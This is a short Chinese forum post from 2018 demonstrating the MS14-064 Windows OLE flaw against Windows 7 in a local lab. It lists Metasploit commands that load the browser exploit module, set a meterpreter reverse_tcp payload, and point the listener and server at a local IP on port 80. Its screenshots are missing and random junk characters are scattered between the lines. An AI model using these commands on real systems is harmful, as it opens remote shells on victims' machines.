找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1435|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

' o3 ~" p# k. P& \ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 & f- s% u& z3 `4 H1 H# h0 z% Z

! h' a* Z/ p0 Q. V' u

1 t0 h; l9 W( X6 T3 o3 Y 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 3 c0 y K) N6 H3 f% P

1 [8 ~: h% Y8 ?* h

9 j& Z/ U" i, X8 v+ k 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ! ~: p i. n/ _: y6 {

3 O# Z O. O. Q" B6 I4 g. K

3 p* v$ Q3 P( ?# n             set AllowPowershellPrompt true 8 p9 A1 G$ |( W' w9 y

( \ O6 N3 p" Q9 G- B

7 A) b3 @8 n v+ v* {             Set LHOST 192.168.0.109" N( \3 Z0 ~! a1 Z0 U) \( F4 A

" H$ A% {9 H0 h4 w& R8 y

1 H! S3 ~3 H% d. @             set SRVHOST 192.168.0.1092 l! b$ U* [& Y3 q( l

7 }: g- y8 k5 s, K- o/ {7 T

% y/ K+ u& h* j( }; R             Set uripath share) M6 _) D! U! o

! [+ y+ @, ~8 \

+ I# A2 P" }# p$ P: Q9 t             Set srvport 80 $ T' h6 `0 P; Q

C0 z& ?$ I, V4 P# a& _7 J

" o3 C% b7 ?9 E, n  7 q! X& P2 L" p, x9 d8 N6 `% w! a

0 f/ ?8 ^' e* H& V

+ U: O$ B/ X6 }6 r; a+ \8 r1 x   # `- J- M1 _6 ~/ y g! X

2 a7 O3 f* H7 s( H9 p5 `( O

: |! K' ~$ I; t' r) X/ t* E  ) x3 V( Y: g+ G4 u1 m. A

/ ^0 ^! ~5 e+ J8 E( _

9 `0 Q1 i0 g8 D/ l0 T   5 U" c' L4 S g: {* G; Y; Y

' j- d1 g, g( r& m

; Q3 \' m5 A8 u) Y8 P   , R* k- v3 _- S0 F# b

2 C: d# w) Z& c! K

: ]: Y6 _* y8 V3 Z 下面我们来访问本地地址如图: 3 f5 V: x, f6 h6 ?& K- n( D

8 c/ Y# x; i! P& Z6 K9 ^' Z

0 W7 w+ w4 l8 A7 l/ s* G9 s: @   9 Y2 [) ?7 P" ]$ _

% K# {3 s' d2 y. G' Y) Z3 s3 Y. Q

0 `% \3 p) G7 [/ A5 k7 A  6 f5 Q! w U3 j6 M3 ?1 M! b

+ u6 |* \9 {0 D2 ^. G, G5 x

( ^1 [/ U! S. ]8 F5 J , U& y. X4 \4 F' \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表